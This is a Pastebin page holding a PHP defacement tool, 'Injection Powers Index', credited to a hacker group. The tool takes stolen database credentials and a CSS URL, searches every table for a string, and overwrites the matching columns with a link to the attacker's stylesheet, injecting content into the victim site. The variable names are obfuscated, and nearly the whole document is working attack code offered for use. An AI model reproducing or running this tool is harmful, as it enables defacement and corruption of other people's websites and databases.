API tools faq
paste
Guest User

Untitled

a guest
Jun 19th, 2018
137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.64 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. echo '<html>
  4. <head>
  5. <title> Injection Powers Index </title>
  6. <style type="text/css">
  7. html,body {
  8.     margin: 0;
  9.     padding: 0;
  10.     outline: 0;
  11. }
  12.  
  13.  
  14. body {
  15.    direction: ltr;
  16.    background-color:#000000;
  17.    color: rgb(153, 153, 153);
  18.    text-align: center
  19. }
  20. input {
  21. font-weight: bold;
  22. color: #FFFFFF;
  23. dashed #ffffff;
  24. border: 1px dotted #555555;
  25. background-color: black;
  26. padding: 2px
  27.  
  28. }
  29.  
  30. input:focus{
  31. box-shadow:0px 0px 3px #DDDDDD;
  32. border: 0px dotted #DDDDDD;
  33. }
  34. input:hover{
  35. box-shadow:0px 0px 3px #DDDDDD;
  36.  
  37. }
  38. .hedr
  39. {
  40. font-family: Courier New,Tahoma  ;
  41. font-size: 26px;
  42. text-shadow: 0px 0px 3px red ;
  43.  
  44. }
  45. .all
  46. {
  47.  margin-left: auto;
  48.  margin-right: auto;
  49.  width: 40%;
  50.  padding: 5px;
  51.  
  52.  
  53.   -moz-box-shadow:    inset 0 0 20px #222222;
  54.   -webkit-box-shadow: inset 0 0 20px #222222;
  55.   box-shadow:         inset 0 0 20px #222222;
  56.  
  57. }
  58.  
  59. .all2
  60. {
  61.  margin-left: auto;
  62.  margin-right: auto;
  63.  width: 40%;
  64.  padding: 5px;
  65.  
  66.  
  67.   -moz-box-shadow:    inset 0 0 20px #222222;
  68.   -webkit-box-shadow: inset 0 0 20px #222222;
  69.   box-shadow:         inset 0 0 20px #222222;
  70.  
  71. }
  72. .tab{
  73.  
  74.  font-size: 18px;
  75.  font-family:Tahoma, Arial, sans-serif;
  76.  color: #BBBBBB;
  77.  text-shadow: #FF0000;
  78.  
  79. }
  80. .tab tr{
  81.  
  82. padding: 5px;
  83. box-shadow:0px 0px 1px #333333;
  84.  
  85. }
  86. .tab tr td{
  87.  
  88. padding: 5px;
  89.  
  90.  
  91. }
  92. .inj{
  93.  
  94. font-family: Tahoma;
  95.  
  96. font-size: 18px;
  97.  
  98. color: #336600;
  99. }
  100. .inj2{
  101.  
  102. font-family: Tahoma;
  103.  
  104. font-size: 18px;
  105.  
  106. color: red;
  107. }
  108. .fot{
  109.  
  110. font-family:Tahoma;
  111. color:#333333;
  112. font-size: 9pt;
  113. text-shadow: 0px 0px 2px #222222;
  114.  
  115. }
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123. </style>
  124. </head>
  125.  
  126. <body>
  127. <br /><br />
  128.  
  129.  
  130. <div class="hedr"> Injection Powers Index </div> <br />
  131. ';
  132. function search($IIIIIIIIIIIl){
  133. $IIIIIIIIIII1 = mysql_query("SHOW TABLE STATUS");
  134. $IIIIIIIIIIll = array();
  135. while($table = mysql_fetch_array($IIIIIIIIIII1)){
  136. $IIIIIIIIII1l = "SELECT * FROM $table[Name]";
  137. $IIIIIIIIII11 = mysql_query($IIIIIIIIII1l);
  138. $IIIIIIIIIlII = @mysql_fetch_assoc($IIIIIIIIII11);
  139. if(!$IIIIIIIIIlII){
  140. continue;
  141. }
  142. $IIIIIIIIIlI1 = array_keys($IIIIIIIIIlII);
  143. $IIIIIIIIIIll[$table['Name']] = $IIIIIIIIIlI1;
  144. }
  145. $IIIIIIIIIlll = array();
  146. foreach($IIIIIIIIIIll as $table=>$IIIIIIIIIlI1){
  147. $IIIIIIIIII1l = "SELECT * FROM `$table` WHERE ";
  148. foreach($IIIIIIIIIlI1 as $IIIIIIIIIll1=>$column){
  149. if($IIIIIIIIIll1 == 0){
  150. $IIIIIIIIII1l .= "`$column` LIKE '%$IIIIIIIIIIIl%'";
  151. }else{
  152. $IIIIIIIIII1l .= " OR `$column` LIKE '%$IIIIIIIIIIIl%'";
  153. }
  154. }
  155. $IIIIIIIIII1l = mysql_query($IIIIIIIIII1l);
  156. $IIIIIIIIII11 = mysql_num_rows($IIIIIIIIII1l);
  157. if($IIIIIIIIII11 >0){
  158. $IIIIIIIIIlll[] = $table;
  159. }
  160. }
  161. $IIIIIIIIIl1l = array();
  162. foreach($IIIIIIIIIlll as $table){
  163. $IIIIIIIIIlI1 = $IIIIIIIIIIll[$table];
  164. foreach($IIIIIIIIIlI1 as $column){
  165. $IIIIIIIIII1l = "SELECT * FROM `$table` WHERE `$column` LIKE '%$IIIIIIIIIIIl%'";
  166. $IIIIIIIIII1l = mysql_query($IIIIIIIIII1l);
  167. $IIIIIIIIII11 = mysql_num_rows($IIIIIIIIII1l);
  168. if($IIIIIIIIII11 >0){
  169. $IIIIIIIIIl1l[] = array('table'=>$table,'column'=>$column);
  170. }
  171. }
  172. }
  173. return $IIIIIIIIIl1l;
  174. }
  175. $hostname = $_POST['hostname'];
  176. $username = $_POST['username'];
  177. $password = $_POST['password'];
  178. $database = $_POST['database'];
  179. $index = $_POST['index'];
  180. $search = $_POST['search'];
  181. if(!isset($_GET['step'])){
  182. echo '<div class="all"><br /><br /><pre><form method="POST" action="?step=1">
  183.  
  184. Hostname  : <input type="text" name="hostname">
  185.  
  186. Username  : <input type="text" name="username">
  187.  
  188. Password  : <input type="text" name="password">
  189.  
  190. Database  : <input type="text" name="database">
  191.  
  192. Css Url   : <input type="text" name="index">
  193.  
  194.    <input type="submit" value="start" >
  195. </form></pre><br /><br /></div>
  196.  
  197. <br /><div class="fot"> ||
  198. Idea :: Mr.Alsa3ek ||
  199. Programming :: G-B ||
  200. <td>Designer :: Al-Swisre ||
  201. <br /><br />
  202. Muslims Hackers</div>';
  203. }
  204. elseif($_GET['step'] == 1){
  205. $IIIIIIIII1l1 = @mysql_connect($hostname,$username,$password) or die('Database Information Incorrect');
  206. @mysql_select_db($database,$IIIIIIIII1l1) or die('Database Name Incorrect');
  207. echo '<div class="all"><form method="POST">
  208.    <br /><br /><input name="search" type="text">
  209.    <input type="submit" value="Search">
  210.    <input type="hidden" name="username" value="'.$username.'">
  211.    <input type="hidden" name="password" value="'.$password.'">
  212.    <input type="hidden" name="database" value="'.$database.'">
  213.    <input type="hidden" name="hostname" value="'.$hostname.'">
  214.    <input type="hidden" name="index" value="'.$index.'">
  215.    </form>';
  216. if(isset($_POST['search'])){
  217. $IIIIIIIIII11 = search($search);
  218. if(count($IIIIIIIIII11) == 0){
  219. echo 'No Result.';
  220. exit();
  221. }
  222. foreach($IIIIIIIIII11 as $IIIIIIIII111){
  223. $table = $IIIIIIIII111['table'];
  224. $column = $IIIIIIIII111['column'];
  225. echo '<form method="POST" action="?step=2">
  226.            <input type="hidden" name="username" value="'.$username.'">
  227.            <input type="hidden" name="password" value="'.$password.'">
  228.            <input type="hidden" name="database" value="'.$database.'">
  229.            <input type="hidden" name="hostname" value="'.$hostname.'">
  230.            <input type="hidden" name="search" value="'.$search.'">
  231.            <input type="hidden" name="index" value="'.$index.'">
  232.            <input type="hidden" name="table" value="'.$table.'">
  233.            <input type="hidden" name="column" value="'.$column.'">
  234.            <br />
  235.           <table width="40%" align="center" class="tab">
  236.           <tr>
  237.           <td> Table </td>
  238.           <td>'.$table.'</td>
  239.           </tr>
  240.           </table>
  241.           <br />
  242.           <table width="40%" align="center" class="tab">
  243.           <tr>
  244.           <td>Column</td>
  245.           <td>'.$column.'</td>
  246.           </tr>
  247.           </table>
  248.           <table width="40%" align="center">
  249.           <tr>
  250.           <td colspan="2" align="center"><input type="submit" value="Inject" class="pd"></td>
  251.           </tr>
  252.            </form>
  253.            <br /><tr></table>';
  254. }
  255. }
  256. }elseif($_GET['step'] == 2){
  257. $table = $_POST['table'];
  258. $column = $_POST['column'];
  259. $IIIIIIIII1l1 = mysql_connect($hostname,$username,$password) or die('Database Information Incorrect');
  260. mysql_select_db($database,$IIIIIIIII1l1) or die('Database Name Incorrect');
  261. $IIIIIIIIIIll ="<head><link href=$index  type=text/css rel=stylesheet></head>";
  262. $IIIIIIIIIIll = addslashes($IIIIIIIIIIll);
  263. $IIIIIIIIII1l = mysql_query("UPDATE ".$table." SET ".$column." ='$IIIIIIIIIIll' WHERE `$column` LIKE '%$search%'") or die(mysql_error());
  264. if($IIIIIIIIII1l){
  265. echo '<div class="inj"><br /><br /> The update process is completed </div>';
  266. }else{
  267. echo '<div class="inj2"><br /><br /> The update process is  not completed </div>';
  268. }
  269. }
  270. ;echo '<br /><br />
  271.  
  272.  
  273. </body>
  274. </html>';;–àK
  275. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!